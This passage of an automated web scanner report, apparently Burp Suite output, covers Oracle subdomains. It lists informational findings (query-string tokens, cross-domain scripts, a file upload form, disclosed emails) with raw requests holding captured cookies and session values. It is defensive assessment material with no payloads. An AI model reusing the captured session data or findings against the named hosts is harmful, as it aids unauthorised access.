Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
10.1. http://apex.oracle.com/pls/otn/f
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://apex.oracle.com
Path:
/pls/otn/f
Issue detail
The page was loaded from a URL containing a query string:http://apex.oracle.com/pls/otn/f?p=42988:3:4168696846582948::NO::: http://www.oracleimg.com/us/assets/oralogo-small.gif
Request
GET /pls/otn/f?p=42988:3:4168696846582948::NO::: HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/corporate/contact/about-your-account-070507.html;q=0.3525731666862_42988=339128DA72ED85F6; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318816293527; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fcorporate%2Fcontact%2Fabout-your-account-070507.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fcorporate%25252Fcontact%25252Fabout-your-account-070507.html%2526pidt%253D1%2526oid%253Djavascript%25253AopenWindow('http%25253A%25252F%25252Fapex.oracle.com%25252Fpls%25252Fotn%25252Ff%25253Fp%25253D42988%25253A2'%25252C''%25252C'595'%25252C'435')%2526ot%253DA; BIGipServerapex-ext_oracle_com_http=1680380557.24862.0000
Response
HTTP/1.1 200 OK-11g/htmldb.oracle.com">/theme_V3.css" type="text/css" />...[SNIP]... <img border="0" src="http://www.oracleimg.com/us/assets/oralogo-small.gif"> <table summary="" cellpadding="0" width="100%" cellspacing="0" border="0">...[SNIP]...
10.2. http://events.oracle.com/search/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://events.oracle.com
Path:
/search/search
Issue detail
The page was loaded from a URL containing a query string:http://events.oracle.com/search/search?group=Events&keyword=OPN+Only http://dnn506yrbagrg.cloudfront.net/pages/scripts/0006/3948.js http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab http://maps.google.com/maps/api/js?sensor=true http://twitter.com/oracleevents http://www.oracleimg.com/ocom/groups/public/documents/digitalasset/dropdown-arrow-new.gif http://www.oraclestore.com/
Request
GET /search/search?group=Events&keyword=OPN+Only HTTP/1.1
Response
HTTP/1.1 200 OK-11g Oracle-Web-Cache-11g/11.1.1.4.0 (N;ecid=1362846513327523,0:1)...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"> </script>...[SNIP]... 'evSearch','img1');" onmouseout="panelMOu('evSearch');" href="#">United States<img style="MARGIN-LEFT: 4px;" id="img1" border="0" alt="Change Country, Oracle Worldwide Web Sites" src= "http://www.oracleimg.com/ocom/groups/public/documents/digitalasset/dropdown-arrow-new.gif" /> </a>...[SNIP]... <a href="http://www.oraclestore.com/" class="text"> Merchandise</a>...[SNIP]... <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" /fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" ...[SNIP]... <a href="http://twitter.com/oracleevents"> <img src="searchui/images/markers/twitter_16x16.png" alt="twitter" height="16" width="16"></a><a href="http://twitter.com/oracleevents" target="_blank"> Oracle Events on Twitter</a>...[SNIP]... <script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0006/3948.js"> </script>...[SNIP]...
11. Cross-domain script include
previous
next
There are 13 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
11.1. https://campus.oracle.com/campus/HR/aus_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/aus_main.html
Issue detail
The response dynamically includes the following script from another domain:http://platform.linkedin.com/in.js
Request
GET /campus/HR/aus_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script src="http://platform.linkedin.com/in.js" type="text/javascript"> ...[SNIP]...
11.2. https://campus.oracle.com/campus/HR/cn_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/cn_main.html
Issue detail
The response dynamically includes the following script from another domain:http://platform.linkedin.com/in.js
Request
GET /campus/HR/cn_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script src="http://platform.linkedin.com/in.js" type="text/javascript"> ...[SNIP]...
11.3. https://campus.oracle.com/campus/HR/india_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/india_main.html
Issue detail
The response dynamically includes the following script from another domain:http://platform.linkedin.com/in.js
Request
GET /campus/HR/india_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script src="http://platform.linkedin.com/in.js" type="text/javascript"> ...[SNIP]...
11.4. https://campus.oracle.com/campus/HR/sg_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/sg_main.html
Issue detail
The response dynamically includes the following script from another domain:http://platform.linkedin.com/in.js
Request
GET /campus/HR/sg_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script src="http://platform.linkedin.com/in.js" type="text/javascript"> ...[SNIP]...
11.5. http://crmondemand.oracle.com/en/index.htm.
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://crmondemand.oracle.com
Path:
/en/index.htm.
Issue detail
The response dynamically includes the following script from another domain:http://www.oracleimg.com/us/assets/metrics/ora_error.js
Request
GET /en/index.htm. HTTP/1.1
Response
HTTP/1.1 200 OK-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=66;ecid=50154525435839520,0:1)...[SNIP]... <script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_error.js"> </script>...[SNIP]...
11.6. http://events.oracle.com/search/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://events.oracle.com
Path:
/search/search
Issue detail
The response dynamically includes the following scripts from other domains:http://dnn506yrbagrg.cloudfront.net/pages/scripts/0006/3948.js http://maps.google.com/maps/api/js?sensor=true
Request
GET /search/search?group=Events&keyword=OPN+Only HTTP/1.1
Response
HTTP/1.1 200 OK-11g Oracle-Web-Cache-11g/11.1.1.4.0 (N;ecid=1362846513327523,0:1)...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"> </script>...[SNIP]... <script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0006/3948.js"> </script>...[SNIP]...
11.7. http://solutions.oracle.com/home/basic_search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/home/basic_search
Issue detail
The response dynamically includes the following scripts from other domains:http://code.google.com/apis/gears/gears_init.js http://maps.google.com/maps/api/js?sensor=false
Request
GET /home/basic_search HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=92538;ecid=122144739788,0)_search/xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"> </script><script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"> </script>...[SNIP]...
11.8. http://solutions.oracle.com/portal/page/portal/auto_searches/browse_products/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/auto_searches/browse_products/
Issue detail
The response dynamically includes the following scripts from other domains:http://code.google.com/apis/gears/gears_init.js http://maps.google.com/maps/api/js?sensor=false
Request
GET /portal/page/portal/auto_searches/browse_products/ HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.com/portal/page/portal/searchresults;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/portal/page/portal/searchresults; gpw_e24=http%3A//solutions.oracle.com/portal/page/portal/searchresults; s_sq=oracleglobal%2Coraclesolutionscatalog%3D%2526pid%253DOPN%252520Solutions%252520Catalog%252520-%252520Search%252520Results%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//solutions.oracle.com/portal/page/portal/auto_searches/browse_products/%2526ot%253DA
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=22;ecid=117850466372,0)_searches/browse_products//xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"> </script><script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"> </script>...[SNIP]...
11.9. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/
Issue detail
The response dynamically includes the following scripts from other domains:http://code.google.com/apis/gears/gears_init.js http://maps.google.com/maps/api/js?sensor=false
Request
GET /portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/ HTTP/1.1
Response
HTTP/1.1 200 OK+AMERICA+AF7668106FCC0F72E040578C52E12D0A+7943B303FA163202D6673E5F24FBB61634327EA4FEB2B4A1F07824F917876092D1847591CCF15B3BE6F7A2540EB84A7C2D6F5624EEEB23095C69E6C3D61A4BC19D4B600E16C9225DB13EA0533C1B1A11D3BAA48DF4E137C4; path=/-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=449255;ecid=134994811307,0)_searches/partners/specializations/applications/oracle_policy_automation/=1292735117.25118.0000; path=//xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"> </script><script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"> </script>...[SNIP]...
11.10. http://solutions.oracle.com/portal/page/portal/error
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/error
Issue detail
The response dynamically includes the following scripts from other domains:http://code.google.com/apis/gears/gears_init.js http://maps.google.com/maps/api/js?sensor=false
Request
GET /portal/page/portal/error HTTP/1.1.com/portal/page/portal/searchresults;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=92482;ecid=135029740140,0)/xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"> </script><script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"> </script>...[SNIP]...
11.11. http://solutions.oracle.com/portal/page/portal/searchresults
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/searchresults
Issue detail
The response dynamically includes the following scripts from other domains:http://code.google.com/apis/gears/gears_init.js http://maps.google.com/maps/api/js?sensor=false
Request
POST /portal/page/portal/searchresults HTTP/1.1.com-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D+search+faq+contact&mo=containsany&sepg=57&fi=1&fs=57&pu=1&has=&as=2065%2C0&pao=equal&pav=Bermuda&pan=sc_membership_location&pas=0&p_action=SUBMIT&ll=
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TM;max-age=2592000+0;age=0;ecid=173684412940,1)results/xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"> </script><script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"> </script>...[SNIP]...
11.12. http://solutions.oracle.com/solutions/bmg/consulting
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/solutions/bmg/consulting
Issue detail
The response dynamically includes the following scripts from other domains:http://code.google.com/apis/gears/gears_init.js http://maps.google.com/maps/api/js?sensor=false
Request
GET /solutions/bmg/consulting HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.com/portal/page/portal/searchresults;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=2;ecid=122145429190,0)/bmg/consulting/xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"> </script><script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"> </script>...[SNIP]...
11.13. http://solutions.oracle.com/specializedpartners/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/specializedpartners/
Issue detail
The response dynamically includes the following scripts from other domains:http://code.google.com/apis/gears/gears_init.js http://maps.google.com/maps/api/js?sensor=false
Request
GET /specializedpartners/ HTTP/1.1
Response
HTTP/1.1 200 OK+AMERICA+AF76739406FE58A3E040578C51E11AE1+C6405FE855A5760E772F3DFEFED889B7D6B7CD665F8BD8F797CEE2750AC703C0C2AA39586DB16688E0F8186FB8876A00F9DDB232E9A4CF16D3511E6FA4D71A4A46F633E2A917F9E06B97CFD6CE52A64C4AAD864882FA3C65; path=/-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=466851;ecid=72057711852870427,0)lizedpartners/=1309512333.25118.0000; path=//xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"> </script><script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"> </script>...[SNIP]...
12. File upload functionality
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-upload-file.jsp
Issue detail
The page contains a form which is used to submit a user-supplied file to the following URL:https://campus.oracle.com/campus/HR/us-upload_file.jsp
Issue background
File upload functionality is commonly associated with a number of vulnerabilities, including:File path traversal Persistent cross-site scripting Placing of other client-executable code into the domain Transmission of viruses and other malware Denial of service Whether uploaded content can subsequently be downloaded via a URL within the application. What Content-type and Content-disposition headers the application returns when the file's content is downloaded. Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed. Whether the application performs any filtering on the file extension or MIME type of the uploaded file. Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file). What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location. Whether archive formats such as ZIP are unpacked by the application. How the application handles attempts to upload very large files, or decompression bomb files.
Issue remediation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:Use a server-generated filename if storing uploaded files on disk. Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks. Enforce a whitelist of accepted, non-executable file extensions. If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment. Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration. Reject attempts to upload archive formats such as ZIP.
Request
GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]... <input name="file1" type="file" id="file1"> </td>...[SNIP]...
13. Email addresses disclosed
previous
next
There are 21 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
13.1. https://campus.oracle.com/campus/HR/aus_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/aus_main.html
Issue detail
The following email address was disclosed in the response:campusrelations_au@oracle.com
Request
GET /campus/HR/aus_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="Australia" data-themecolor="#959595" data-email="campusrelations_au@oracle.com ">...[SNIP]...
13.2. https://campus.oracle.com/campus/HR/cn_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/cn_main.html
Issue detail
The following email address was disclosed in the response:campusrelations_ch@oracle.com
Request
GET /campus/HR/cn_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="China" data-themecolor="#959595" data-email="campusrelations_ch@oracle.com ">...[SNIP]...
13.3. https://campus.oracle.com/campus/HR/emea_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/emea_main.html
Issue detail
The following email address was disclosed in the response:graduates-emea_ww@oracle.com
Request
GET /campus/HR/emea_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... graduates-emea_ww@oracle.com ?subject=Graduate%20Program%20EMEA" class="link1" style="color:#999999">...[SNIP]... graduates-emea_ww@oracle.com ?subject=Graduate%20Program%20EMEA" target="_blank">...[SNIP]... graduates-emea_ww@oracle.com ?subject=Graduate%20Program%20EMEA" class="link2">...[SNIP]...
13.4. https://campus.oracle.com/campus/HR/india_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/india_main.html
Issue detail
The following email address was disclosed in the response:campusrelations_in@oracle.com
Request
GET /campus/HR/india_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="India" data-themecolor="#959595" data-email="campusrelations_in@oracle.com ">...[SNIP]...
13.5. https://campus.oracle.com/campus/HR/japan_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/japan_main.html
Issue detail
The following email addresses were disclosed in the response:Campusrelations_jp@oracle.com campusrelations_jp@oracle.com
Request
GET /campus/HR/japan_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... campusrelations_jp@oracle.com ?subject=Oracle%20Japan%20Website' class='link style6_1'>Campusrelations_jp@oracle.com </a>...[SNIP]... campusrelations_jp@oracle.com ?subject=Oracle%20Japan%20Website' class='link style6_1'>Campusrelations_jp@oracle.com </a>...[SNIP]...
13.6. https://campus.oracle.com/campus/HR/script/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/script/s_code.js
Issue detail
The following email address was disclosed in the response:
Request
